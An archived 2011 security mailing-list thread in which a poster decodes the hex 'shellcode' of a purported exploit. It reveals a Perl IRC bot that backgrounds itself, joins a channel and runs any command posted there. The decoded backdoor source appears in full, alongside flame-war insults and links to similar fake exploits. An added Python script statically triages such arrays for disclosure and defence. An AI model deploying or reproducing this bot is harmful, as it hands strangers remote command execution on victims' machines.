Open Source and information security mailing list archives
Message-ID: <CAKevSJ_2KyVbf_Aoc5ChHakcALgLtJOKgCzx-n5GS+WynKZ-XA@mail.gmail.com>
Date: Wed, 26 Oct 2011 16:55:03 +1100
From: Flavio do Carmo Junior <carmo.flavio@...il.com>
To: full-disclosure@...ts.grok.org.uk
Subject: Re: I know its old, but what the heck does this do... (exposing a tool...) sounds really useful...

[waKKu@...5n ~]$ python -c 'hellcode=( "\x23\x21\x2f\x75\x73\x72\x2f\x62\x69\x6e\x2f\x70\x65\x72\x6c\x0a\x24\x63"
> "\x68\x61\x6e\x3d\x22\x23\x64\x61\x72\x6b\x6e\x65\x74\x22\x3b\x24\x6e\x69"
> "\x63\x6b\x3d\x22\x6d\x6f\x72\x6f\x6e\x22\x3b\x24\x73\x65\x72\x76\x65\x72"
> "\x3d\x22\x65\x66\x6e\x65\x74\x2e\x76\x75\x75\x72\x77\x65\x72\x6b\x2e\x6e"
> "\x6c\x22\x3b\x24\x53\x49\x47\x7b\x54\x45\x52\x4d\x7d\x3d\x7b\x7d\x3b\x65"
> "\x78\x69\x74\x20\x69\x66\x20\x66\x6f\x72\x6b\x3b\x75\x73\x65\x20\x49\x4f"
> "\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3b\x24\x73\x6f\x63\x6b\x20\x3d\x20\x49"
> "\x4f\x3a\x3a\x53\x6f\x63\x6b\x65\x74\x3a\x3a\x49\x4e\x45\x54\x2d\x3e\x6e"
> "\x65\x77\x28\x24\x73\x65\x72\x76\x65\x72\x2e\x22\x3a\x36\x36\x36\x37\x22"
> "\x29\x7c\x7c\x65\x78\x69\x74\x3b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63"
> "\x6b\x20\x22\x55\x53\x45\x52\x20\x6d\x6f\x72\x6f\x6e\x20\x2b\x69\x20\x6d"
> "\x6f\x72\x6f\x6e\x20\x3a\x6d\x6f\x72\x6f\x6e\x76\x32\x5c\x6e\x4e\x49\x43"
> "\x4b\x20\x6d\x6f\x72\x6f\x6e\x5c\x6e\x22\x3b\x24\x69\x3d\x31\x3b\x77\x68"
> "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x3d\x7e\x2f\x5e\x5b\x5e\x20"
> "\x5d\x2b\x20\x28\x5b\x5e\x20\x5d\x2b\x29\x20\x2f\x29\x7b\x24\x6d\x6f\x64"
> "\x65\x3d\x24\x31\x3b\x6c\x61\x73\x74\x20\x69\x66\x20\x24\x6d\x6f\x64\x65"
> "\x3d\x3d\x22\x30\x30\x31\x22\x3b\x69\x66\x28\x24\x6d\x6f\x64\x65\x3d\x3d"
> "\x22\x34\x33\x33\x22\x29\x7b\x24\x69\x2b\x2b\x3b\x24\x6e\x69\x63\x6b\x3d"
> "\x7e\x73\x2f\x5c\x64\x2a\x24\x2f\x24\x69\x2f\x3b\x70\x72\x69\x6e\x74\x20"
> "\x24\x73\x6f\x63\x6b\x20\x22\x4e\x49\x43\x4b\x20\x24\x6e\x69\x63\x6b\x5c"
> "\x6e\x22\x3b\x7d\x7d\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
> "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x50\x52\x49\x56\x4d\x53"
> "\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x48\x69\x2c\x20\x49\x6d\x20\x61\x20"
> "\x6d\x6f\x72\x6f\x6e\x20\x74\x68\x61\x74\x20\x72\x61\x6e\x20\x61\x20\x66"
> "\x61\x6b\x65\x20\x30\x64\x61\x79\x20\x65\x78\x70\x6c\x6f\x69\x74\x2e\x20"
> "\x76\x32\x5c\x6e\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20"
> "\x3a\x74\x6f\x20\x72\x75\x6e\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x73\x20\x6f"
> "\x6e\x20\x6d\x65\x2c\x20\x74\x79\x70\x65\x3a\x20\x22\x2e\x24\x6e\x69\x63"
> "\x6b\x2e\x22\x3a\x20\x63\x6f\x6d\x6d\x61\x6e\x64\x5c\x6e\x22\x3b\x77\x68"
> "\x69\x6c\x65\x28\x3c\x24\x73\x6f\x63\x6b\x3e\x29\x7b\x69\x66\x20\x28\x2f"
> "\x5e\x50\x49\x4e\x47\x20\x28\x2e\x2a\x29\x24\x2f\x29\x7b\x70\x72\x69\x6e"
> "\x74\x20\x24\x73\x6f\x63\x6b\x20\x22\x50\x4f\x4e\x47\x20\x24\x31\x5c\x6e"
> "\x4a\x4f\x49\x4e\x20\x24\x63\x68\x61\x6e\x5c\x6e\x22\x3b\x7d\x69\x66\x28"
> "\x73\x2f\x5e\x5b\x5e\x20\x5d\x2b\x20\x50\x52\x49\x56\x4d\x53\x47\x20\x24"
> "\x63\x68\x61\x6e\x20\x3a\x24\x6e\x69\x63\x6b\x5b\x5e\x20\x3a\x5c\x77\x5d"
> "\x2a\x3a\x5b\x5e\x20\x3a\x5c\x77\x5d\x2a\x20\x28\x2e\x2a\x29\x24\x2f\x24"
> "\x31\x2f\x29\x7b\x73\x2f\x5c\x73\x2a\x24\x2f\x2f\x3b\x24\x5f\x3d\x60\x24"
> "\x5f\x60\x3b\x66\x6f\x72\x65\x61\x63\x68\x28\x73\x70\x6c\x69\x74\x20\x22"
> "\x5c\x6e\x22\x29\x7b\x70\x72\x69\x6e\x74\x20\x24\x73\x6f\x63\x6b\x20\x22"
> "\x50\x52\x49\x56\x4d\x53\x47\x20\x24\x63\x68\x61\x6e\x20\x3a\x24\x5f\x5c"
> "\x6e\x22\x3b\x73\x6c\x65\x65\x70\x20\x31\x3b\x7d\x7d\x7d\x23\x63\x68\x6d"
> "\x6f\x64\x20\x2b\x78\x20\x2f\x74\x6d\x70\x2f\x68\x69\x20\x32\x3e\x2f\x64"
> "\x65\x76\x2f\x6e\x75\x6c\x6c\x3b\x2f\x74\x6d\x70\x2f\x68\x69"); print hellcode;'
#!/usr/bin/perl
$chan="#darknet";$nick="moron";$server="efnet.vuurwerk.nl";$SIG{TERM}={};exit if fork;use IO::Socket;$sock = IO::Socket::INET->new($server.":6667")||exit;print $sock "USER moron +i moron :moronv2\nNICK moron\n";$i=1;while(<$sock>=~/^[^ ]+ ([^ ]+) /){$mode=$1;last if $mode=="001";if($mode=="433"){$i++;$nick=~s/\d*$/$i/;print $sock "NICK $nick\n";}}print $sock "JOIN $chan\nPRIVMSG $chan :Hi, Im a moron that ran a fake 0day exploit. v2\nPRIVMSG $chan :to run commands on me, type: ".$nick.": command\n";while(<$sock>){if (/^PING (.*)$/){print $sock "PONG $1\nJOIN $chan\n";}if(s/^[^ ]+ PRIVMSG $chan :$nick[^ :\w]*:[^ :\w]* (.*)$/$1/){s/\s*$//;$_=`$_`;foreach(split "\n"){print $sock "PRIVMSG $chan :$_\n";sleep 1;}}}#chmod +x /tmp/hi 2>/dev/null;/tmp/hi
[waKKu@...5n ~]$ print hellcode[764:];'
/tmp/hi

--

On 26 October 2011 13:49, xD 0x41 <secn3t@...il.com> wrote:
> yer ofc... anyhow, ignoring you now...
>
> you obv think you're some leet troll, you're not, you're ONLY a TROLL :)
> have a nice day or is that
>
> *Goplamamamama Ignananayu*
>
> forget the jedi oky, you gotta brush up on ya troll trash talk!
> bah hahaha.
> fool
> xd
>
>
> On 26 October 2011 13:44, Antony widmal <antony.widmal@...il.com> wrote:
>>
>> Using your smartphone while flipping burger can be dangerous pandawan.
>> Moreover if you work at burger king.
>>
>>
>>
>> On Tue, Oct 25, 2011 at 10:26 PM, xD 0x41 <secn3t@...il.com> wrote:
>>>
>>> h the idiot who thinks I'm laurelai... meh , you're a fool yourself just for
>>> even thinking that much :s
>>> you're but an echo on the list, which, does not echo the rest of it, which is
>>> a good place to be.
>>> unfortunately, you're one of the few who should just be blocked, for making
>>> absolutely nothing but abusive crap...
>>> you're an idiot. not me.
>>> i don't run things, why, have you ran it ?
>>> Is it good ?
>>> hehe... maybe it is!
>>> i guess if he's using it...well...
>>> *sic*
>>>
>>>
>>>
>>> On 26 October 2011 13:21, Antony widmal <antony.widmal@...il.com> wrote:
>>>>
>>>> Do yourself a favor and run that code dumbass.
>>>>
>>>> On Tue, Oct 25, 2011 at 10:18 PM, xD 0x41 <secn3t@...il.com> wrote:
>>>>>
>>>>> I use darknets to help me,
>>>>> they send me the info i need.
>>>>> simple answer to simple question.
>>>>> look them up, they may one day protect you, also.
>>>>>
>>>>>
>>>>> On 26 October 2011 13:15, adam <adam@...sy.net> wrote:
>>>>>>
>>>>>> http://home.no/exploited/exploits/kmodaxx.c (almost[?] identical code,
>>>>>> claims to be a remote kernel root exploit)
>>>>>> http://www.securitylab.ru/forum/forum32/topic3728/?PAGEN_1=2 (very
>>>>>> similar code, claims to be an IIS exploit)
>>>>>> http://seclists.org/fulldisclosure/2003/Jun/456 (didn't read entire
>>>>>> thread, code is mentioned though)
>>>>>> I'm sure there's more, but this kinda reminds me of that leaked
>>>>>> "private exploit" on pastebin a few weeks back (you know, the one that was
>>>>>> nice enough to create a _local_ root account), and insisted that it was
>>>>>> private private private and specifically said NOT to leak it.
>>>>>> I am curious as to how you're so certain that it's on "many many
>>>>>> boxes" yet know next to nothing about it.
>>>>>> On Tue, Oct 25, 2011 at 8:50 PM, xD 0x41 <secn3t@...il.com> wrote:
>>>>>>>
>>>>>>> Hello List,
>>>>>>> I'd like people to also, like this thread asks, to pls give some
>>>>>>> opinion, other than mine.. which, i am yet to make;
>>>>>>>
>>>>>>> http://www.hackerthreads.org/Topic-5973
>>>>>>>
>>>>>>> Please look at this .c code on here, if you wish, and tell me, why
>>>>>>> A. It is still in circulation, seemingly, on MANY MANY boxes....
>>>>>>> B. people still seem to try keep it private :s
>>>>>>>
>>>>>>> This morning, a friend from webhostingtalk.com, asked me to take a
>>>>>>> look.
>>>>>>> I have and, i can only so far say, once i decrypt the shellcode, I'll
>>>>>>> know a bit more..
>>>>>>> altho, i remember this thing, and, so many people were after it,
>>>>>>> people were paying for it, this is first time i have seen it actually
>>>>>>> disclosed tho,
>>>>>>> admittedly only looked today.
>>>>>>> If skiddies are using it to ddos things, I want to make sure i can
>>>>>>> expose it, and kill the threats.
>>>>>>> thank you.
>>>>>>> xd .// exposing bullshit as i ride!
>>>>>>>
>>>>>>>
>>>>>>> _______________________________________________
>>>>>>> Full-Disclosure - We believe in it.
>>>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>>>
>>>>>
>>>>>
>>>>> _______________________________________________
>>>>> Full-Disclosure - We believe in it.
>>>>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>>>> Hosted and sponsored by Secunia - http://secunia.com/
>>>>
>>>
>>
>
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

--
--
Best regards,
Flávio do Carmo Júnior
Sydney/NSW
http://au.linkedin.com/in/carmoflavio/en
http://0xcd80.wordpress.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
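
The decoding shown in the message above can be done without ever compiling or running the file. The following is an added example, not part of the original thread: it statically extracts `\xNN` string arrays from C source and reports whether the decoded bytes are printable script text rather than machine code. The sample source, its array names and the marker list are constructed for illustration.

```python
import re

# Constructed sample: C source laid out like a purported exploit with a
# "shellcode" array. The bytes are a harmless two-line shell script.
SAMPLE_C = r'''
char hellcode[] =
  "\x23\x21\x2f\x62\x69\x6e\x2f\x73\x68\x0a"
  "\x65\x63\x68\x6f\x20\x68\x69\x0a";
char pad[] = "\x00\x01\xfe\xff\x80\x81\x90\x7f";
'''

# name[] = "..." "..." ;   (adjacent string literals are concatenated in C)
ARRAY_RE = re.compile(
    r'(\w+)\s*\[\s*\d*\s*\]\s*=\s*((?:\s*"(?:[^"\\]|\\.)*")+)\s*;')
ESCAPE_RE = re.compile(r'\\x([0-9a-fA-F]{2})')

# Assumed marker list: strings that belong in a script, not in machine code.
MARKERS = (b"#!/", b"/bin/sh", b"perl", b"PRIVMSG", b"IO::Socket",
           b"chmod ", b"/tmp/")


def decode_arrays(c_source):
    """Return {array_name: bytes} built from the \\xNN escapes of each array."""
    decoded = {}
    for name, literals in ARRAY_RE.findall(c_source):
        decoded[name] = bytes(int(h, 16) for h in ESCAPE_RE.findall(literals))
    return decoded


def triage(blob):
    """Score one decoded blob: mostly printable plus script markers = not shellcode."""
    printable = sum(1 for b in blob if 32 <= b < 127 or b in (9, 10, 13))
    ratio = printable / len(blob) if blob else 0.0
    hits = [m.decode() for m in MARKERS if m in blob]
    return {
        "printable_ratio": round(ratio, 2),
        "markers": hits,
        "looks_like_script": ratio > 0.95 and bool(hits),
    }


def report(c_source):
    """Triage every escaped array found in the source text."""
    return {name: triage(blob) for name, blob in decode_arrays(c_source).items()}


if __name__ == "__main__":
    for name, blob in decode_arrays(SAMPLE_C).items():
        print(name, triage(blob), repr(blob[:60]))
```
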